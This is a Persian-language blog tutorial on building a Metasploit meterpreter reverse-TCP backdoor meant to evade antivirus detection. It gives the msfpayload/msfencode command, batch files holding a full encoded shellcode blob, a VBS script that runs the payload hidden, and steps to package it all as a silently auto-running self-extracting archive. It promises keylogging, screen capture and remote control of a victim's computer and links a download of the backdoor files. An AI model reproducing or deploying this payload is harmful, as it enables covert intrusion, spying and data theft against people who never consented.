ساخټ فایڸ غیرقابل شناسایی(بک دور)
- چهارشنبه, ۴ آذر ۱۳۹۴، ۱۰:۳۱ ب.ظ
ساختن فایل غیر قابل شناسایی با آنتی از طریق متا اسپلویت
بسم الله الرحمن الرحیم
ساخت بک دوری که با برنامه متااسپلویت که با آنتی ویروس ها قابل شناسایی نیست.
توانایی های برجسته این بک دور به شرح زیر می باشد:
آپلود و دانلود کردن فایل در کامپیوتر هدف
نصب key logger در کامپیوتر هدف
عکس گرفتن از صفحه نمایش کامپیوتر هدف
کنترل از راه دور کامپیوتر هدف به صورت کاملا گرافیکی
گرفتن اطلاعات کامل سیستم هدف (اطلاعات رجیستری و ...)
و بسیاری دیگر از قابلیت های دیگر
حال به نحوه ساخت و ابزار مورد نیاز آن می پردازیم.
سیستم عامل بک ترک که برنامه متا اسپلویت در آن نصب باشد
برنامه Syring.exe (کار این برنامه قابل فهم کردن کدهای ساخته شده توسط متا اسپلوت و دور زدن آنتی ویروس ها)
فایل های cmd.bat،s.bat و I.vbs که آموزش ساخت آن را در مراحل بعدی آموزش خواهیم داد.لینک دانلود فایلها(http://uploadtak.com/images/v67_backdoor.zip)
نحوه ساخت:
سیستم عامل بک ترک را بوت کرده و در ترمینال دستورات زیر را تایپ کنید این کار برای ساختن کد های فایل مورد نظر است که پورت و هاست را به سلیقه خود می توانید تغییر دهید و آی پی وی پی اس خود را برای آن ست کنید.
کد PHP:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.1.153 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
حال فایل Cmd.bat را در یک ویرایشگر متنی باز کرد و متن های زیر زیر را در آن تایپ کنید.
کد PHP:
@
echo off echo syringe.exe -3 PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIilIxLIWpwp30SPK9zE6QyBRDnkrr4pLKRr6lLKsbVtNkSBthfoX7aZFF6QyoVQyPllElpa1l7rtlupO1XOdMeQyWjBXppR1GNkQB4PNk72ElC1XPnkaPBXOuiPcDCzUQ8PBplK2hVxnkQHa031kcYsUlpInk5dlK6aKfFQIovQkpLl9QhOtMC1XGVXkPQezTc3QmZXek1mfD2U8b0Xnk3hFDwqYCbFNk4LBkNkBxgl7q9CLKDDNkVaZpMY0D6DEtCk1Ke169aJv1io9pv8soaJnk6rhkMVSmqxp3TrePuP0hSGT3WBaORt580LPwtfgwkOHUH8Z0uQc0uPwYjdRtrpe8UyoppkGpIoJurpF0pPV0g0pPaP60E8zJfoYOm0yoYElWRJGuU8H9VbfodfU8S2S0uQmkOyhfQz4PCfbwSXJ9LeQdSQ9ohUK5YPQd6lIoPNS8PuJLE8XpNUi21F9oKepj5P3ZET66v72HtBzyJhSoioKelK4vbJ3pe8304PC0C0QFRJ302HaHI4pSiuyoJumCBs3Z30aFRssg3XVbiIYXCoKOhU7qzcFIo6lE8vD5zL9SAA> s.bat
wscript i.vbs s.bat
ملاحظه می کنید که کد های ساخته شده در بک ترک را در اینجا کپی می کنیم توجه داشته باشد که در فایل متنی بعد از -3 یک اسپیس زده و کد ها را بین -3 و >s.bat کپی نمایید.
حال فایلS.bat را باز کرده و متن های زیر را در آن کپی کنید
کد PHP:
syringe.exe -3 PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIilIxLIWpwp30SPK9zE6QyBRDnkrr4pLKRr6lLKsbVtNkSBthfoX7aZFF6QyoVQyPllElpa1l7rtlupO1XOdMeQyWjBXppR1GNkQB4PNk72ElC1XPnkaPBXOuiPcDCzUQ8PBplK2hVxnkQHa031kcYsUlpInk5dlK6aKfFQIovQkpLl9QhOtMC1XGVXkPQezTc3QmZXek1mfD2U8b0Xnk3hFDwqYCbFNk4LBkNkBxgl7q9CLKDDNkVaZpMY0D6DEtCk1Ke169aJv1io9pv8soaJnk6rhkMVSmqxp3TrePuP0hSGT3WBaORt580LPwtfgwkOHUH8Z0uQc0uPwYjdRtrpe8UyoppkGpIoJurpF0pPV0g0pPaP60E8zJfoYOm0yoYElWRJGuU8H9VbfodfU8S2S0uQmkOyhfQz4PCfbwSXJ9LeQdSQ9ohUK5YPQd6lIoPNS8PuJLE8XpNUi21F9oKepj5P3ZET66v72HtBzyJhSoioKelK4vbJ3pe8304PC0C0QFRJ302HaHI4pSiuyoJumCBs3Z30aFRssg3XVbiIYXCoKOhU7qzcFIo6lE8vD5zL9SAA
در اینجا هم کد ها را کپی کرده سپس تغییرات را ذخیره کرده و سیو کنید.
حال فایل i.vbs را در ویرایشگر متنی باز کنید و دستورات زیر را را در آن تاپ کرده و سیو کنید.
کد PHP:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
حال هر 4 فایل را در یک پوشه کپی کنید.
حال باید یک فایل فشرده sfx از این فایل ها بسازیم
به صورت زیر عمل کنید.
4 فایل را گرفته و راست کلیک کرده و Add to archive را زده و تیک create sfx archive را بزنید. سپس به تب Advanced می روید.
حال روی sfx options رفته در پنجره جدید باز شده در تب General در قسمت Path to extract (%temp%) را تایپ کنید.
حال به تب setup رفته و در قسمت run after extraction (cmd.bat) را تایپ کنید.
حال به تب modes رفته و گزینه hide all را فعال نمایید.
حال به تب advanced رفته و نام تمام فایلهای ساخته شده را با جدا کردن از طریق space تمام فایلها را قرار می دهیم.
حال به تب update رفته و گزینهoverwrite all files را فعال نمایید.
حال همه پنجره ها را ok کرده تا فایل ساخته شود
